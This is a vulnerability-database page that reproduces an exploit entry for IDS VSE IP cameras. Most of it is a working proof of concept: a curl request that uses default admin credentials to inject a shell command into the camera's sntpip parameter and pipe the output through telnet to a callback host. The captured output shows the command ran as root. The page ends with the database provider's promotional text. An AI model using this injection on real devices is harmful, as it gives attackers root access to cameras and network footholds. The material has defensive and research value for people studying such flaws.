Vulners
Lucene search
IDS VSE IP Camera - Authenticated Remote Code Execution Vulnerability
curl --verbose "http://admin:[email protected]:PORT/ctrl.cgi?language=ie&sntpip=;uname%20-a|telnet%20CALLBACK%2026;&timezone=13&setdaylight=0&timeformat=2&tstampformat=2&timefrequency=-1"
curl command output:
* Connected to TARGET (TARGET) port PORT (#0)
* Server auth using Basic with user 'admin'
> GET /ctrl.cgi?language=ie&sntpip=;uname%20-a|telnet%20CALLBACK%2026;&timezone=13&setdaylight=0&timeformat=2&tstampformat=2&timefrequency=-1 HTTP/1.1
> Authorization: Basic YWRtaW46YWRtaW4=
> User-Agent: curl
> Host: TARGET:PORT
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-type: text/html
< Pragma: no-cache
< Cache-Control: no-store
* no chunk, no close, no size. Assume close to signal end
<
OK language
OK sntpip
OK timezone
OK setdaylight
UW timeformatOK tstampformat
OK timefrequency
* Closing connection 0
netcat output:
Connection from [TARGET] port 26 [tcp/*] accepted (family 2, sport 2101)
Linux IDSVSE 2.6.18_pro500-davinci_IDS_DM36x_1.1.5 #1 PREEMPT Tue Sep 20 09:08:48 CEST 2011 armv5tejl unknown
other fun output:
uid=0(root) gid=0(root)
BusyBox v1.2.2 (2007.03.11-00:56+0000) multi-call binary
Usage: busybox [function] [arguments]...
or: [function] [arguments]...
BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. Most people will create a
link to busybox for each function they wish to use and BusyBox
will act like whatever it was invoked as!
Currently defined functions:
[, [[, addgroup, adduser, arping, ash, awk, basename, bunzip2,
busybox, bzcat, cat, chgrp, chmod, chown, chroot, chvt, clear,
cmp, cp, cpio, crond, crontab, cut, date, dc, dd, deallocvt, delgroup,
deluser, devfsd, df, dirname, dmesg, dos2unix, du, echo, egrep,
env, expr, false, fbset, fdisk, fgrep, find, fold, free, ftpget,
ftpput, getty, grep, gunzip, gzip, halt, hdparm, head, hexdump,
hostid, hostname, httpd, hwclock, id, ifconfig, ifdown, ifup,
inetd, init, insmod, install, ip, ipcalc, kill, killall, klogd,
last, length, linuxrc, ln, loadkmap, logger, login, logname, losetup,
ls, lsmod, makedevs, md5sum, mesg, mkdir, mkfifo, mknod, mkswap,
mktemp, modprobe, more, mount, mt, mv, nameif, nc, netstat, nice,
nslookup, od, openvt, passwd, patch, pidof, ping, ping6, pivot_root,
poweroff, printf, ps, pwd, rdate, readlink, realpath, reboot,
renice, reset, rm, rmdir, rmmod, route, rpm2cpio, run-parts, rx,
sed, seq, sh, sha1sum, sleep, sort, start-stop-daemon, strings,
stty, su, sulogin, swapoff, swapon, sync, syslogd, tail, tar,
tee, telnet, telnetd, test, tftp, time, top, touch, tr, traceroute,
true, tty, umount, uname, uniq, unix2dos, unzip, uptime, usleep,
uudecode, uuencode, vconfig, vi, vlock, watch, wc, wget, which,
who, whoami, xargs, yes, zcat
# 0day.today [2018-03-20] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Apr 2017 00:00Current
7.5High risk
Vulners AI Score7.5